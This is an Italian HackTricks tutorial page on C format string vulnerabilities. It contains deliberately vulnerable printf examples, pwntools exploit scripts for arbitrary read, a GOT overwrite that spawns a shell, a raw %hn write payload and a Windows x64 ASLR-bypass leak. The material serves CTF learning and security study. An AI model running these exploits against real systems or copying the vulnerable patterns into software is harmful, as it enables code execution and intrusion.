Format Strings

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Controlla i piani di abbonamento!

Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.

Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.

Informazioni di base

In C printf è una funzione che può essere usata per stampare una stringa. Il primo parametro che questa funzione si aspetta è il testo grezzo con i formatters. I parametri successivi sono i valori con cui sostituire i formatters presenti nel testo grezzo.

Altre funzioni vulnerabili sono sprintf() e fprintf().

La vulnerabilità si manifesta quando un attacker text è usato come primo argomento di questa funzione. L’attacker sarà in grado di costruire un input speciale che abusa delle capacità della stringa di formato di printf per leggere e scrivere qualsiasi dato in qualsiasi indirizzo (leggibile/scrivibile). In questo modo è possibile eseguire codice arbitrario.

Formatters:

%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3

Esempi:

Esempio vulnerabile:

char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.

Uso normale:

int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5

Con argomenti mancanti:

printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.

fprintf vulnerabile:

#include <stdio.h>

int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
fprintf(output_file, user_input); // The user input can include formatters!
fclose(output_file);
return 0;
}

Accesso ai puntatori

Il formato %<n>$x, dove n è un numero, permette di indicare a printf di selezionare il parametro n (dallo stack). Quindi, se vuoi leggere il 4° parametro dallo stack usando printf potresti fare:

printf("%x %x %x %x")

e leggeresti dal primo al quarto parametro.

Oppure potresti fare:

printf("%4$x")

e leggere direttamente il quarto.

Notice that the attacker controls the printf parameter, which basically means that his input is going to be in the stack when printf is called, which means that he could write specific memory addresses in the stack.

Caution

Un attaccante che controlla questo input sarà in grado di aggiungere indirizzi arbitrari nello stack e far sì che printf li acceda. Nella sezione successiva sarà spiegato come usare questo comportamento.

Arbitrary Read

È possibile usare il formatter %n$s per far sì che printf prenda l’indirizzo situato nella posizione n, seguirlo e stamparlo come se fosse una stringa (stampa fino a quando non viene trovato 0x00). Quindi, se l’indirizzo base del binary è 0x8048000, e sappiamo che il user input inizia alla 4a posizione nello stack, è possibile stampare l’inizio del binary con:

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

Caution

Nota che non puoi mettere l’indirizzo 0x8048000 all’inizio dell’input perché la stringa conterrà 0x00 alla fine di quell’indirizzo.

Trova l’offset

Per trovare l’offset rispetto al tuo input puoi inviare 4 o 8 byte (0x41414141) seguiti da %1$x e aumentare il valore finché non recuperi le A's.

Brute Force printf offset

```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

Iterate over a range of integers

for i in range(10):

Construct a payload that includes the current integer as offset

payload = f“AAAA%{i}$x“.encode()

Start a new process of the “chall” binary

p = process(“./chall”)

Send the payload to the process

p.sendline(payload)

Read and store the output of the process

output = p.clean()

Check if the string “41414141” (hexadecimal representation of “AAAA”) is in the output

if b“41414141“ in output:

If the string is found, log the success message and break out of the loop

log.success(f“User input is at offset : {i}“) break

Close the process

p.close()

</details>

### Quanto è utile

Arbitrary reads possono essere utili per:

- **Dump** del **binary** dalla memoria
- **Access a parti specifiche della memoria dove sono memorizzate** **info** sensibili (come canaries, encryption keys o custom passwords come in questo [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))

## **Arbitrary Write**

Il formatter **`%<num>$n`** **scrive** il **numero di byte scritti** nell'**indirizzo indicato** dal parametro <num> nello stack. Se un attaccante può scrivere quanti char vuole con printf, potrà far sì che **`%<num>$n`** scriva un numero arbitrario in un indirizzo arbitrario.

Fortunatamente, per scrivere il numero 9999 non è necessario aggiungere 9999 "A" all'input: è possibile usare il formatter **`%.<num-write>%<num>$n`** per scrivere il numero **`<num-write>`** nell'**indirizzo puntato dalla posizione `num`**.
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

Tuttavia, nota che solitamente, per scrivere un indirizzo come 0x08049724 (che è un numero ENORME da scrivere in una sola volta), si usa $hn invece di $n. Questo permette di scrivere solo 2 Bytes. Perciò questa operazione viene fatta due volte, una per i 2B più alti dell’indirizzo e un’altra per quelli più bassi.

Quindi, questa vulnerabilità permette di scrivere qualsiasi cosa in qualsiasi indirizzo (arbitrary write).

In questo esempio, l’obiettivo sarà quello di sovrascrivere l’indirizzo di una function nella tabella GOT che verrà chiamata più tardi. Anche se questo potrebbe sfruttare altre tecniche di arbitrary write to exec:

Write What Where 2 Exec

Ci accingiamo a sovrascrivere una function che riceve i suoi argomenti dall’utente e puntarla verso la funzione system.
Come detto, per scrivere l’indirizzo di solito sono necessari 2 passaggi: prima si scrivono 2 Bytes dell’indirizzo e poi gli altri 2. Per farlo si usa $hn.

HOB indica i 2 byte più alti dell’indirizzo
LOB indica i 2 byte più bassi dell’indirizzo

Poi, a causa del funzionamento delle format string è necessario scrivere prima il più piccolo tra [HOB, LOB] e poi l’altro.

If HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

If HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

Modello Pwntools

Puoi trovare un template per preparare un exploit per questo tipo di vulnerabilità in:

Format Strings Template

Oppure questo esempio di base da here:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

Format Strings to BOF

È possibile abusare delle azioni di scrittura di una vulnerabilità di format string per scrivere in indirizzi dello stack e sfruttare una vulnerabilità di tipo buffer overflow.

Windows x64: Format-string leak to bypass ASLR (no varargs)

Su Windows x64 i primi quattro parametri interi/puntatore vengono passati nei registri: RCX, RDX, R8, R9. In molte call-site vulnerabili la stringa controllata dall’attaccante viene usata come format argument ma non vengono forniti variadic arguments, per esempio:

// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);

Poiché non vengono passati varargs, qualsiasi conversione come “%p”, “%x”, “%s” farà sì che il CRT legga il successivo argomento variadico dal registro appropriato. Con la calling convention Microsoft x64 la prima lettura di questo tipo per “%p” proviene da R9. Qualsiasi valore transitorio in R9 al call-site verrà stampato. In pratica questo spesso provoca un leak di un puntatore stabile in-module (es., un puntatore a un oggetto locale/globale precedentemente messo in R9 dal codice circostante o un valore salvato dal callee), che può essere usato per recuperare la module base e bypassare ASLR.

Practical workflow:

Inietta un formato innocuo come “%p “ all’inizio della stringa controllata dall’attaccante, in modo che la prima conversione venga eseguita prima di qualsiasi filtraggio.
Cattura il pointer leak, identifica l’offset statico di quell’oggetto all’interno del modulo (eseguendo una singola reverse con simboli o con una copia locale), e recupera l’image base come leak - known_offset.
Riusa quella base per calcolare indirizzi assoluti di ROP gadgets e IAT entries da remoto.

Example (abbreviated python):

from pwn import remote

# Send an input that the vulnerable code will pass as the "format"
fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-"  # leading %p leaks R9
io = remote(HOST, 4141)
# ... drive protocol to reach the vulnerable snprintf ...
leaked = int(io.recvline().split()[2], 16)   # e.g. 0x7ff6693d0660
base   = leaked - 0x20660                     # module base = leak - offset
print(hex(leaked), hex(base))

Note:

L’esatto offset da sottrarre si trova una volta durante local reversing e poi viene riutilizzato (same binary/version).
Se “%p” non stampa un puntatore valido al primo tentativo, provare altri specifier (“%llx”, “%s”) o conversioni multiple (“%p %p %p”) per campionare altri argument registers/stack.
Questo pattern è specifico della Windows x64 calling convention e delle implementazioni printf-family che prendono varargs inesistenti dai registri quando la format string li richiede.

Questa tecnica è estremamente utile per bootstrap ROP su Windows services compilati con ASLR e senza ovvie memory disclosure primitives.

Altri esempi & riferimenti

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32 bit, no relro, no canary, nx, no pie, uso base di format strings per effettuare un leak della flag dallo stack (non è necessario alterare il flusso di esecuzione)
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32 bit, relro, no canary, nx, no pie, format string per sovrascrivere l’indirizzo di fflush con la funzione win (ret2win)
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
32 bit, relro, no canary, nx, no pie, format string per scrivere un indirizzo dentro main in .fini_array (così il flusso torna indietro 1 volta in più) e scrivere l’indirizzo di system nella GOT puntando a strlen. Quando il flusso torna in main, strlen viene eseguito con input utente e puntando a system, eseguirà i comandi passati.

Riferimenti

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Controlla i piani di abbonamento!

Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.

Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.